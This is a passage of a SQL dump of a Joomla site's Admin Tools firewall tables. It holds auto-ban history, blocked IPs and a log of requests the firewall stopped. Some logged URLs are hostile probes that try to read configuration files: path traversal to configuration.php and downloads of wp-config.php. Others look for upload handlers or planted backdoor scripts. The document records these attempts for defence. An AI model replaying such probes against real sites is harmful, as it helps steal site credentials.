10:12:18'),(760,'185.220.101.75','httpbl','2022-04-29 11:10:18'),(762,'45.153.160.140','httpbl','2022-04-29 12:56:38'),(763,'95.214.52.208','httpbl','2022-04-29 17:00:53'),(764,'185.220.100.245','httpbl','2022-04-30 23:28:21'),(765,'185.220.100.240','httpbl','2022-04-30 23:28:29'),(766,'45.153.160.140','httpbl','2022-05-01 04:01:04'),(767,'195.176.3.19','404shield','2022-05-01 04:59:35'),(769,'46.38.247.22','httpbl','2022-05-02 21:06:50'),(770,'23.184.48.148','httpbl','2022-05-02 22:09:51'),(771,'198.96.155.3','httpbl','2022-05-03 23:22:25'),(772,'178.62.220.93','httpbl','2022-05-04 04:40:01'),(774,'85.195.206.194','404shield','2022-05-04 15:02:11'),(775,'198.98.61.102','httpbl','2022-05-04 16:08:53'),(776,'185.220.103.120','httpbl','2022-05-05 22:40:02'),(777,'199.249.230.179','404shield','2022-05-06 09:29:10'),(778,'164.92.218.139','httpbl','2022-05-06 10:34:30'),(779,'51.195.166.195','httpbl','2022-05-06 20:00:56'),(780,'185.220.101.63','httpbl','2022-05-07 19:13:31'),(781,'185.220.101.69','httpbl','2022-05-08 05:26:31'),(782,'109.70.100.92','httpbl','2022-05-08 06:36:02'),(783,'185.220.101.39','httpbl','2022-05-08 07:40:38'),(784,'185.212.149.103','httpbl','2022-05-11 17:10:52'),(785,'188.166.242.236','404shield','2022-05-11 21:46:35'),(787,'51.195.166.195','httpbl','2022-05-12 02:32:02'),(788,'209.141.55.26','httpbl','2022-05-12 07:38:14'),(789,'89.58.38.0','httpbl','2022-05-12 08:45:54'),(790,'188.166.242.236','404shield','2022-05-12 11:45:53'),(791,'176.37.35.139','adminpw','2022-05-12 14:29:45'),(792,'217.160.145.62','404shield','2022-05-14 21:06:33'),(793,'62.197.136.102','404shield','2022-05-14 21:55:12'),(794,'31.210.20.101','404shield','2022-05-15 02:10:27'),(795,'31.210.20.170','404shield','2022-05-16 06:11:54'),(796,'51.91.7.5','404shield','2022-05-17 00:51:40'),(797,'218.208.12.56','404shield','2022-05-18 02:41:14'),(798,'204.12.234.250','404shield','2022-05-18 19:32:37'),(799,'206.123.140.38','404shield','2022-05-19 02:38:36'),(800,'217.160.145.62','404shield','2022-05-19 14:10:49'),(801,'20.70.215.1','404shield','2022-05-20 06:46:56'),(802,'217.160.145.62','404shield','2022-05-20 07:07:35'),(803,'65.108.134.53','404shield','2022-05-21 17:00:19'),(804,'185.174.159.43','httpbl','2022-05-25 13:59:57'),(805,'192.187.118.90','404shield','2022-05-26 06:59:42'),(806,'20.205.139.105','adminpw','2022-05-27 23:46:00'),(807,'20.216.13.211','404shield','2022-05-28 04:09:48'),(808,'2.56.57.26','404shield','2022-05-29 10:39:23'),(809,'2.56.57.26','404shield','2022-06-04 17:10:43'),(810,'185.174.159.43','httpbl','2022-06-05 12:12:35'),(811,'20.83.26.133','404shield','2022-06-08 14:04:45'),(812,'20.193.152.26','404shield','2022-06-08 16:42:09'),(813,'149.202.87.41','404shield','2022-06-09 18:55:43'),(814,'20.5.24.216','404shield','2022-06-12 13:53:07'),(815,'185.174.159.43','httpbl','2022-06-14 20:08:16'),(816,'134.249.60.197','adminpw','2022-06-15 05:10:06'),(817,'20.232.201.5','404shield','2022-06-16 19:04:47'),(818,'20.83.31.18','404shield','2022-06-19 22:53:18'),(819,'159.69.26.216','404shield','2022-06-25 14:24:37'),(820,'40.83.40.175','404shield','2022-06-30 14:02:01'),(821,'185.7.145.88','httpbl','2022-07-01 13:06:44'),(822,'20.238.44.106','404shield','2022-07-01 16:35:28'),(823,'83.22.207.193','404shield','2022-07-01 17:14:35'),(824,'185.220.101.44','adminpw','2022-07-01 17:14:39'),(825,'116.203.243.214','404shield','2022-07-02 09:35:02'),(826,'20.113.91.89','404shield','2022-07-03 03:12:37'),(827,'51.141.34.3','404shield','2022-07-03 09:38:33'),(828,'78.47.240.140','404shield','2022-07-03 14:33:26'),(829,'20.45.181.14','404shield','2022-07-03 23:32:05'),(830,'78.47.240.140','404shield','2022-07-04 01:34:02'),(831,'20.205.234.193','404shield','2022-07-04 07:17:54'),(832,'52.13.19.175','404shield','2022-07-05 01:57:34'),(833,'20.89.17.46','404shield','2022-07-05 21:27:22'),(834,'20.89.17.46','sessionshield','2022-07-06 01:15:14'),(835,'20.55.26.141','404shield','2022-07-06 03:43:33'),(836,'168.63.241.68','404shield','2022-07-06 05:05:31'),(837,'20.236.29.2','404shield','2022-07-06 21:05:48'),(838,'20.236.29.2','404shield','2022-07-07 12:45:20'),(839,'79.143.187.168','httpbl','2022-07-09 08:14:13'),(840,'52.165.132.224','404shield','2022-07-09 10:35:16'),(841,'78.47.98.223','404shield','2022-07-10 04:18:20'),(842,'20.218.120.196','404shield','2022-07-11 14:26:34'),(843,'129.45.51.234','404shield','2022-07-11 14:32:23'),(844,'20.218.120.196','404shield','2022-07-12 00:33:29'),(845,'20.235.4.183','404shield','2022-07-12 06:00:45'),(846,'20.45.181.14','404shield','2022-07-13 23:58:46'),(847,'52.142.148.247','404shield','2022-07-14 00:28:26'),(848,'20.45.181.14','404shield','2022-07-14 02:31:03'),(849,'5.161.98.209','404shield','2022-07-15 05:44:16'),(850,'107.150.46.166','404shield','2022-07-15 08:14:33'),(851,'173.208.234.154','404shield','2022-07-15 15:45:40'),(852,'116.203.154.251','404shield','2022-07-15 23:56:03'),(853,'3.133.130.30','404shield','2022-07-15 23:30:38'),(854,'185.254.94.237','404shield','2022-07-16 08:17:08'),(855,'20.235.4.183','404shield','2022-07-16 11:52:20'),(856,'92.204.145.239','404shield','2022-07-17 21:46:24'),(857,'193.151.180.35','404shield','2022-07-18 05:08:06'),(858,'20.26.206.191','404shield','2022-07-20 08:09:12'),(859,'20.90.30.57','404shield','2022-07-21 07:10:57'),(860,'204.12.241.154','404shield','2022-07-22 16:30:15'),(861,'194.34.132.57','adminpw','2022-07-24 21:11:45'),(862,'109.70.100.27','httpbl','2022-07-23 09:12:47'),(863,'194.34.132.57','adminpw','2022-07-25 09:03:02'),(865,'20.26.206.191','404shield','2022-07-25 10:37:35'),(866,'5.228.32.101','httpbl','2022-07-25 18:49:50'),(867,'20.25.157.59','404shield','2022-07-26 10:34:11'),(868,'171.22.30.115','404shield','2022-07-25 22:42:37'),(869,'40.66.45.48','404shield','2022-07-28 13:13:55'),(870,'107.150.46.163','404shield','2022-08-02 03:54:05'),(871,'20.238.126.37','404shield','2022-08-02 20:46:05'),(872,'192.187.111.162','404shield','2022-08-02 23:23:09'),(873,'40.89.128.138','sessionshield','2022-08-03 00:48:52'),(874,'41.250.80.18','404shield','2022-08-03 03:32:51'),(875,'20.83.180.254','404shield','2022-08-03 13:01:01'),(876,'20.83.180.254','404shield','2022-08-03 14:29:12'),(877,'3.83.242.131','404shield','2022-08-03 16:45:04'),(878,'70.37.162.140','404shield','2022-08-03 18:23:00'),(879,'20.38.2.17','404shield','2022-08-03 18:52:24'),(880,'35.238.100.219','404shield','2022-08-03 18:55:30'),(881,'20.83.180.254','404shield','2022-08-03 20:20:09'),(882,'167.172.195.213','404shield','2022-08-03 22:43:03'),(883,'20.127.40.224','404shield','2022-08-04 02:40:56'),(884,'20.25.157.59','404shield','2022-08-04 13:52:00'),(885,'70.37.162.140','404shield','2022-08-04 14:13:25'),(886,'51.142.150.0','404shield','2022-08-04 19:37:33'),(887,'34.122.156.45','404shield','2022-08-04 17:21:27'),(888,'51.142.150.0','404shield','2022-08-05 03:14:39'),(889,'20.231.60.37','404shield','2022-08-05 05:15:11'),(890,'51.142.150.0','404shield','2022-08-05 11:51:41'),(891,'20.231.60.37','404shield','2022-08-05 15:47:37'),(892,'107.182.129.194','404shield','2022-08-06 00:36:44'),(893,'18.119.88.61','404shield','2022-08-06 11:25:19'),(894,'20.216.30.62','404shield','2022-08-06 18:37:19'),(895,'20.119.165.74','404shield','2022-08-07 08:27:07'),(896,'20.216.30.62','404shield','2022-08-06 23:43:58'),(897,'20.189.112.171','404shield','2022-08-07 08:34:32'),(899,'20.119.165.74','sessionshield','2022-08-07 14:04:00'),(900,'70.37.162.140','404shield','2022-08-07 16:04:58'),(901,'20.189.112.171','404shield','2022-08-07 19:07:50'),(902,'20.216.30.62','404shield','2022-08-08 17:44:55'),(903,'20.7.195.208','sessionshield','2022-08-09 03:43:56'),(904,'178.159.37.156','404shield','2022-08-10 21:47:04'),(905,'20.108.183.58','sessionshield','2022-08-11 05:47:23'),(906,'5.161.136.134','404shield','2022-08-11 17:52:43'),(907,'51.142.196.58','404shield','2022-08-12 02:11:18'),(908,'20.111.43.233','404shield','2022-08-12 08:53:54'),(909,'20.111.43.233','404shield','2022-08-12 23:27:54'),(910,'45.83.123.36','404shield','2022-08-13 16:01:52'),(911,'212.237.123.229','404shield','2022-08-15 10:35:47'),(912,'20.168.0.199','404shield','2022-08-16 22:57:45'),(913,'20.168.30.34','404shield','2022-08-16 23:37:30'),(914,'54.92.233.219','404shield','2022-08-17 01:28:53'),(915,'20.125.135.85','404shield','2022-08-17 03:33:23'),(916,'20.196.64.222','404shield','2022-08-17 11:26:09'),(917,'20.100.172.220','404shield','2022-08-17 17:09:36'),(918,'20.125.135.85','404shield','2022-08-17 19:48:18'),(919,'20.125.135.85','404shield','2022-08-17 21:42:36'),(920,'20.163.21.73','404shield','2022-08-18 16:51:31'),(921,'182.73.178.182','404shield','2022-08-18 21:43:39'),(922,'20.168.0.199','404shield','2022-08-19 01:49:52'),(923,'212.227.213.151','404shield','2022-08-20 10:38:12'),(924,'23.96.121.207','404shield','2022-08-23 01:14:25'),(925,'20.163.108.153','404shield','2022-08-25 00:52:29'),(926,'51.15.183.168','404shield','2022-08-26 05:32:46'),(927,'212.227.213.151','404shield','2022-08-27 01:04:21'),(928,'167.235.10.104','404shield','2022-08-28 17:03:38'),(929,'20.163.108.143','404shield','2022-08-28 17:59:30'),(931,'91.191.209.74','404shield','2022-08-29 08:41:05'),(932,'185.238.2.74','404shield','2022-08-29 19:59:50'),(933,'20.39.253.161','404shield','2022-08-30 18:44:39'),(934,'20.163.111.101','404shield','2022-09-03 12:54:16'),(935,'20.163.111.101','404shield','2022-09-03 12:54:16'),(936,'45.229.43.162','404shield','2022-09-01 00:44:58'),(937,'20.163.111.101','404shield','2022-09-05 10:52:47'),(938,'167.235.247.217','404shield','2022-09-05 12:58:47'),(939,'20.24.21.64','404shield','2022-09-06 21:55:02'),(940,'40.121.254.135','404shield','2022-09-08 07:11:24'),(941,'3.8.210.226','404shield','2022-09-08 11:53:36'),(942,'52.189.225.183','404shield','2022-09-09 02:50:51'),(943,'20.171.66.190','404shield','2022-09-09 04:10:33'),(944,'20.172.41.155','404shield','2022-09-10 15:56:51'),(945,'20.192.11.41','404shield','2022-09-11 09:43:05'),(946,'20.172.41.155','404shield','2022-09-10 17:42:29'),(947,'20.192.11.41','404shield','2022-09-11 15:01:41'),(948,'20.74.83.20','404shield','2022-09-11 15:39:49'),(949,'20.171.66.190','404shield','2022-09-12 13:24:06'),(950,'20.199.72.112','404shield','2022-09-12 17:26:20'),(951,'185.220.100.240','httpbl','2022-09-14 08:58:51'),(952,'20.0.222.149','404shield','2022-09-16 13:32:02'),(953,'20.0.222.149','404shield','2022-09-19 02:50:33'),(954,'20.171.80.72','404shield','2022-09-19 16:42:50'),(955,'20.0.222.149','404shield','2022-09-19 21:48:40');
/*!40000 ALTER TABLE `vzx9b_admintools_ipautobanhistory` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_ipblock`
--
DROP TABLE IF EXISTS `vzx9b_admintools_ipblock`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_ipblock` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`ip` varchar(255) DEFAULT NULL,
`description` varchar(255) DEFAULT NULL,
UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=39 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_ipblock`
--
LOCK TABLES `vzx9b_admintools_ipblock` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_ipblock` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_ipblock` VALUES (1,'192.185.146.8','IP automatically blocked after being banned automatically 3 times'),(2,'77.120.176.171','IP automatically blocked after being banned automatically 3 times'),(3,'2.119.45.57','IP automatically blocked after being banned automatically 3 times'),(4,'91.218.15.59','IP automatically blocked after being banned automatically 3 times'),(5,'176.10.99.200','IP automatically blocked after being banned automatically 3 times'),(6,'92.118.77.10','IP automatically blocked after being banned automatically 2 times'),(7,'54.244.25.177','IP automatically blocked after being banned automatically 2 times'),(8,'3.26.60.148','IP automatically blocked after being banned automatically 2 times'),(9,'188.124.42.107','IP automatically blocked after being banned automatically 2 times'),(10,'5.34.179.50','IP automatically blocked after being banned automatically 2 times'),(11,'176.113.115.10','IP automatically blocked after being banned automatically 2 times'),(12,'46.161.11.6','IP automatically blocked after being banned automatically 2 times'),(13,'91.199.149.239','IP automatically blocked after being banned automatically 2 times'),(14,'185.220.100.252','IP automatically blocked after being banned automatically 3 times'),(15,'185.128.26.216','IP automatically blocked after being banned automatically 2 times'),(16,'162.12.206.9','IP automatically blocked after being banned automatically 2 times'),(17,'156.238.183.133','IP automatically blocked after being banned automatically 2 times'),(18,'65.108.217.252','IP automatically blocked after being banned automatically 2 times'),(19,'196.244.192.231','IP automatically blocked after being banned automatically 2 times'),(20,'185.159.156.20','IP automatically blocked after being banned automatically 2 times'),(21,'185.159.156.6','IP automatically blocked after being banned automatically 2 times'),(22,'185.185.134.116','IP automatically blocked after being banned automatically 2 times'),(23,'185.119.81.109','IP automatically blocked after being banned automatically 2 times'),(24,'45.153.160.140','IP automatically blocked after being banned automatically 2 times'),(25,'176.37.35.139','IP automatically blocked after being banned automatically 2 times'),(26,'217.160.145.62','IP automatically blocked after being banned automatically 2 times'),(27,'2.56.57.26','IP automatically blocked after being banned automatically 2 times'),(28,'185.174.159.43','IP automatically blocked after being banned automatically 2 times'),(29,'20.45.181.14','IP automatically blocked after being banned automatically 2 times'),(30,'194.34.132.57','IP automatically blocked after being banned automatically 2 times'),(31,'20.83.180.254','IP automatically blocked after being banned automatically 2 times'),(32,'51.142.150.0','IP automatically blocked after being banned automatically 2 times'),(33,'70.37.162.140','IP automatically blocked after being banned automatically 2 times'),(34,'20.216.30.62','IP automatically blocked after being banned automatically 2 times'),(35,'20.125.135.85','IP automatically blocked after being banned automatically 2 times'),(36,'20.163.111.101','IP automatically blocked after being banned automatically 2 times'),(37,'20.163.111.101','IP automatically blocked after being banned automatically 2 times'),(38,'20.0.222.149','IP automatically blocked after being banned automatically 2 times');
/*!40000 ALTER TABLE `vzx9b_admintools_ipblock` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `vzx9b_admintools_log`
--
DROP TABLE IF EXISTS `vzx9b_admintools_log`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `vzx9b_admintools_log` (
`id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`logdate` datetime NOT NULL,
`ip` varchar(40) DEFAULT NULL,
`url` varchar(10240) DEFAULT NULL,
`reason` enum('other','adminpw','ipwl','ipbl','sqlishield','antispam','wafblacklist','tpone','tmpl','template','muashield','csrfshield','badbehaviour','geoblocking','rfishield','dfishield','uploadshield','xssshield','httpbl','loginfailure','securitycode','external','awayschedule','admindir','sessionshield','nonewadmins','nonewfrontendadmins','configmonitor','phpshield','404shield') DEFAULT NULL,
`extradata` longtext DEFAULT NULL,
UNIQUE KEY `id` (`id`),
KEY `vzx9b_admintools_log_logdate_reason` (`logdate`,`reason`)
) ENGINE=InnoDB AUTO_INCREMENT=8048 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `vzx9b_admintools_log`
--
LOCK TABLES `vzx9b_admintools_log` WRITE;
/*!40000 ALTER TABLE `vzx9b_admintools_log` DISABLE KEYS */;
INSERT INTO `vzx9b_admintools_log` VALUES (1,'2016-08-21 15:20:27','::1','http://localhost:8888/helix/administrator/index.php?option=com_installer','adminpw',''),(2,'2016-08-21 16:17:26','169.0.59.224','http://192.185.146.63/~helix3co/administrator/index.php','adminpw',''),(3,'2016-09-04 18:33:48','169.0.110.82','http://192.185.146.63/~helix3co/administrator/index.php?option=com_sppagebuilder','adminpw',''),(4,'2016-10-26 11:53:27','::1','http://localhost:8888/smith/administrator/index.php','adminpw',''),(5,'2016-10-28 12:53:11','::1','http://localhost:8888/smith/administrator/index.php?option=com_modules&layout=edit&id=110','adminpw',''),(6,'2016-10-28 14:34:39','::1','http://localhost:8888/smith/administrator/index.php?option=com_modules','adminpw',''),(7,'2016-10-29 11:25:56','::1','http://localhost:8888/smith/administrator/index.php?option=com_content','adminpw',''),(8,'2016-10-29 11:25:56','::1','http://localhost:8888/smith/administrator/index.php?option=com_content','adminpw',''),(9,'2016-10-30 06:39:26','::1','http://localhost:8888/smith/administrator/index.php?option=com_sppagebuilder&layout=edit&id=8','adminpw',''),(10,'2016-10-30 09:41:45','::1','http://localhost:8888/smith/administrator/index.php?option=com_sppagebuilder&view=ajax&format=raw&action=addon-load&action_role=edit','adminpw',''),(11,'2016-10-30 09:48:36','::1','http://localhost:8888/smith/administrator/','adminpw',''),(12,'2016-10-30 17:20:38','::1','http://localhost:8888/smith/administrator/','adminpw',''),(13,'2016-10-31 11:50:20','169.1.196.3','http://192.185.146.8/~smithandsmithco/administrator/index.php','adminpw',''),(14,'2016-11-12 06:16:58','169.0.118.247','http://192.185.146.8/~smithandsmithco/administrator/','adminpw',''),(15,'2017-01-11 14:10:33','169.1.174.71','http://www.smithandsmith.co.za/administrator/index.php?option=com_installer&view=update&task=update.ajax&3961aaf4b9f9a3d7db315d1ff389fc55=1&eid=0&skip=700','adminpw',''),(16,'2017-01-11 14:10:34','169.1.174.71','http://www.smithandsmith.co.za/administrator/index.php?option=com_installer&view=update&task=update.ajax&3961aaf4b9f9a3d7db315d1ff389fc55=1&eid=700&cache_timeout=3600','adminpw',''),(17,'2017-01-11 14:11:09','169.1.174.71','http://www.smithandsmith.co.za/administrator/index.php?option=com_installer&view=update&task=update.ajax&3961aaf4b9f9a3d7db315d1ff389fc55=1&eid=0&skip=700','adminpw',''),(18,'2017-02-06 14:21:29','169.0.116.109','http://smithandsmith.co.za/administrator/index.php?option=com_joomlaupdate','adminpw',''),(19,'2017-02-08 15:35:21','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(20,'2017-02-08 15:35:24','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(21,'2017-02-08 17:17:00','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(22,'2017-02-08 17:17:05','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(23,'2017-02-08 17:53:13','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(24,'2017-02-08 18:28:11','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(25,'2017-02-08 18:28:15','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(26,'2017-02-08 19:02:12','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(27,'2017-02-08 19:02:21','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(28,'2017-02-08 19:33:22','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(29,'2017-02-08 20:16:10','62.210.172.203','http://smithandsmith.co.za/administrator/','adminpw',''),(30,'2017-02-09 11:08:57','188.165.220.19','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(31,'2017-02-09 11:09:05','188.165.220.19','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(32,'2017-02-09 11:09:13','188.165.220.19','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(33,'2017-02-11 12:01:25','85.109.208.192','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(34,'2017-02-12 20:43:09','37.9.169.24','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(35,'2017-02-12 20:43:13','37.9.169.24','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(36,'2017-02-12 20:43:26','37.9.169.24','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(37,'2017-02-12 20:43:26','37.9.169.24','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(38,'2017-02-15 08:31:32','62.210.148.91','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(39,'2017-02-16 14:32:44','62.4.22.24','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(40,'2017-02-21 12:42:21','178.165.88.182','http://smithandsmith.co.za/administrator/','adminpw',''),(41,'2017-02-25 00:49:39','83.166.241.88','http://smithandsmith.co.za/administrator/','adminpw',''),(42,'2017-03-02 12:30:23','107.189.1.2','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(43,'2017-03-02 12:30:23','107.189.1.2','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(44,'2017-03-05 23:09:37','65.47.149.110','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(45,'2017-03-07 14:22:31','198.204.251.162','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(46,'2017-03-08 02:10:20','185.7.213.99','http://www.smithandsmith.co.za//components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','dfishield',''),(47,'2017-03-08 04:35:35','65.47.149.110','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(48,'2017-03-08 13:07:53','82.118.24.216','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(49,'2017-03-09 10:02:48','46.118.155.225','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(50,'2017-03-10 13:16:20','122.237.0.112','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(51,'2017-03-11 16:05:33','35.187.49.57','http://www.smithandsmith.co.za/components/com_hdflvplayer/hdflvplayer/download.php?f=../../../configuration.php','dfishield',''),(52,'2017-03-12 14:26:28','122.237.0.112','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(53,'2017-03-13 14:41:04','91.142.223.52','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(54,'2017-03-13 14:41:04','91.142.223.52','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(55,'2017-03-13 14:49:36','91.142.223.52','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(56,'2017-03-13 14:49:44','91.142.223.52','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(57,'2017-03-14 15:45:36','91.142.223.52','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(58,'2017-03-14 15:45:36','91.142.223.52','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(59,'2017-03-14 15:55:14','91.142.223.52','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(60,'2017-03-14 15:55:23','91.142.223.52','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(61,'2017-03-15 15:15:09','169.1.150.220','http://www.smithandsmith.co.za/administrator/index.php?option=com_akeeba','adminpw',''),(62,'2017-03-17 09:56:30','169.1.150.220','http://www.smithandsmith.co.za/administrator/','adminpw',''),(63,'2017-03-20 00:38:56','64.64.6.68','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(64,'2017-03-20 00:39:03','64.64.6.68','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(65,'2017-03-20 00:43:35','64.64.6.68','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(66,'2017-03-20 00:43:44','64.64.6.68','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(67,'2017-03-20 22:01:02','64.64.6.68','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(68,'2017-03-20 22:08:16','64.64.6.68','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(69,'2017-03-23 14:51:05','62.81.195.130','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(70,'2017-03-24 11:59:54','199.217.115.217','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(71,'2017-03-24 12:07:21','199.217.115.217','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(72,'2017-03-24 12:07:42','199.217.115.217','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(73,'2017-03-29 05:05:02','37.187.24.87','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(74,'2017-03-29 05:05:04','37.187.24.87','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(75,'2017-03-29 05:05:15','37.187.24.87','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(76,'2017-03-31 22:38:58','185.9.233.4','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(77,'2017-04-05 11:23:27','199.217.115.217','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(78,'2017-04-05 11:23:32','199.217.115.217','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(79,'2017-04-05 11:23:39','199.217.115.217','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(80,'2017-04-06 17:18:49','50.62.177.215','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(81,'2017-04-06 17:18:53','50.62.177.215','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(82,'2017-04-06 17:19:02','50.62.177.215','http://www.smithandsmith.co.za//wp-admin/options-link.php?666','wafblacklist',''),(83,'2017-04-07 00:51:47','91.121.171.154','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(84,'2017-04-07 00:58:43','91.121.171.154','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(85,'2017-04-07 00:58:56','91.121.171.154','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(86,'2017-04-09 03:03:52','185.9.233.4','http://smithandsmith.co.za/administrator/index.php','adminpw',''),(87,'2017-04-09 12:40:16','149.202.149.223','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(88,'2017-04-10 15:15:15','198.204.224.58','http://www.smithandsmith.co.za/uploadify/uploadify.php?folder=/','dfishield',''),(89,'2017-04-12 15:18:54','95.180.224.36','http://www.smithandsmith.co.za/administrator/index.php','adminpw',''),(90,'2017-04-16 02:01:18','94.23.238.185','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(91,'2017-04-16 02:01:25','94.23.238.185','http://www.smithandsmith.co.za//wp-content/plugins/revslider/temp/update_extract/revslider/.libs.php?55555','wafblacklist',''),(92,'2017-04-16 02:09:58','94.23.238.185','http://www.smithandsmith.co.za//wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&sr','dfishield',''),(93,'2017-04-16 